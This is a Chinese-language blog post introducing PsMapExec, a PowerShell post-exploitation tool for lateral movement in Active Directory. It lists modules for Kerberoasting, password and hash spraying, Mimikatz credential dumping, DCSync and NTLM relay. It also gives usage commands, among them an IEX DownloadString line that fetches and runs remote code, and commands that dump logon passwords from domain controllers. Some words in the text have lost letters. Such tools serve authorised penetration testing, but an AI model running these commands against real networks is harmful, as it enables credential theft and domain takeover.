【神兵利器】内网横向之PsMapExec

【神兵利器】内网横向之PsMapExec

项目介绍

PsMapExec是一个PowerShell工具，灵感主要来自流行工具CrackMapExec / etExec。PsMapExec旨在通过自己的改进将这些工具的功能和感觉带到PowerShell中，PsMapExec被用作一种利用后的工具来评估Active Directory环境

支持方法

当前支持以下方法：

Method	Description
IPM	Dump IPMI hashes
Kerberoast	Kerberoast accounts
MSSQL	Check access, run commands
RDP	Check access
SMB	Check access, run commands
GenRelayList	Check SMB signing status
Spray	Spray passwords and hashes
SessionHunter	Check access, run commands
VC	Check no auth access
WinRM	Check access, run commands
WMI	Check access, run commands

支持模块

Module	Description
Amnesiac	Executes Amnesiac C2 payloads
ColeHistory	Dumps PowerShell cole history
Files	Lists files in common directories for each user
FileZilla	Dumps Filezilla credentials
KerbDump	Dumps Kerberos tickets
eKeys	Dumps encryption keys from memory (Mimikatz)
LogonPasswords	Dumps logon passwords from memory (Mimikatz)
LSA	Dumps LSA (Mimikatz)
TDS	Executes DCsync on the remote system
otepad	Dumps notepad backup files
TLM	Grabs a TLM hash for each user logon session
SAM	Dumps SAM hashes
SCCM	Dumps local AA credentials and task sequences
SessionExec	Executes commands under each user logon session
SessionRelay	Relay TLM hashes under each user logon session
TGTdeleg	Grab a fresh TGT under each user logon session
VC	Dumps VC credentials
Wi-Fi	Dumps Wi-Fi credentials
WinSCP	Dumps WinSCP credentials

使用示例

模块加载

代码语言：javascript代码运行次数：0运行复制

IEX(ew-Object WebClient).DownloadString(".ps1")

简易示例

代码语言：javascript代码运行次数：0运行复制

# Execute WMI commands over all systems in the domain using password authentication
 PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command whoami

# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command whoami

# Check RDP Access against workstati in the domain and using local authentication
PsMapExec -Targets Workstati -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
 
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\temp\ -Method WMI

# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain that have AdminCount=1
PsMapExec -Targets "AdminCount=1" -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets "Domain Admins" -Method Spray -SprayHash [Hash]

# Kerberoast 
PsMapExec -Method Kerberoast -ShowOutput

# IPMI
PsMapExec -Targets 192.168.1.0/24 -Method IPMI

目标搜索

通过PsMapExec进行的目标搜索是通过ADSI搜索器使用的，只要您以域用户帐户的身份从加入域的系统进行操作就不会遇到获取目标的问题，默认情况下只有启用的Active Directory计算机帐户才会填充到目标列表中，除非指定了-Domain，否则PsMapExec会将域设置为当前用户域。与使用内置的ldap查询相比，IP地址定位的优先级较低

代码语言：javascript代码运行次数：0运行复制

# All workstati, servers and domain controllers within the domain
PsMapExec -Targets All

# All workstati, servers and domain controllers on the specified domain
PsMapExec -Targets All -Domain [Domain]

# Only servers from the domain (exluding DCs)
PsMapExec -Targets Servers

# Only Domain Controllers from the domain
PsMapExec -Targets DCs

# Only workstati from the domain
PsMapExec -Targets Workstati

# Set the target values to a defined computer name
PsMapExec -Targets DC01.Security.local

# Read targets from file
PsMapExec -Targets "C:\"

# Wildcard filtering
PsMapExec -Targets SRV*

# Single IP Address
PsMapExec -Targets 192.168.56.11

# CIDR Range
PsMapExec -Targets 192.168.56.0/24

认证类型

当-Command和-Module被省略时PsMapExec将简单地根据指定的目标系统检查提供的或当前的用户凭据，以便通过指定的方法进行管理访问

代码语言：javascript代码运行次数：0运行复制

# Current user
PsMapExec -Targets All -Method [Method]

# With Password
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# With Hash
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256/TLM]

# With Ticket
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI only)
PsMapExec -Targets All -Method WMI -LocalAuth

命令执行

所有当前支持的命令执行方法都支持-Command参数。可以将command参数附加到上述身份验证类型中，以指定用户或当前用户的身份执行给定的命令

代码语言：javascript代码运行次数：0运行复制

PsMapExec -Targets All -Method [Method] -Command [Command]

模块执行

所有当前支持的命令执行方法都支持-Module参数。可以将module参数附加到身份验证类型中以指定用户或当前用户的身份执行给定的模块

代码语言：javascript代码运行次数：0运行复制

PsMapExec -Targets All -Method [Method] -Module [Module]

免责声明

仅限用于技术研究和获得正式授权的攻防项目，请使用者遵守《中华人民共和国网络安全法》，切勿用于任何非法活动，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律连带责任

本文参与 腾讯云自媒体同步曝光计划，分享自。原始发表：2025-01-09，如有侵权请联系 cloudcommunity@tencent 删除系统网络安全工具管理搜索